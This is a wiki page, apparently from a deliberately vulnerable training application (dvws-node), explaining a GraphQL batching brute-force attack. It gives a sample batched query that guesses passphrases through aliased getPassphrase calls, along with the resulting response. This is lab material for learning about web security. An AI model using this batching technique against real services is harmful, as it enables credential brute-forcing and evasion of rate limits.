GraphQL Batching Brute Force - snoopysecurity/dvws-node GitHub Wiki

Details

GraphQL supports batched queries. This feature can be abused to bypass web application firewalls and conduct denial of service attacks.

Technical Details

The getPassphrase endpoint can be brute forced to find passphrases of all users.

query Query {
  first: 	getPassphrase(reminder:"t"){
passphrase,
reminder
  
}
  second: getPassphrase(reminder:"te"){
passphrase,
reminder

}
  third: getPassphrase(reminder:"test"){
passphrase,
reminder
  
}
}

Result:

{
  "data": {
    "first": null,
    "second": null,
    "third": {
      "passphrase": "397a363a383a3180496e6d3371714a7c",
      "reminder": "test"
    }
  }
}

References

• https://lab.wallarm.com/graphql-batching-attack/
• https://blog.assetnote.io/2021/08/29/exploiting-graphql/
• https://www.whiteoaksecurity.com/blog/graphql-batching-attacks-turbo-intruder/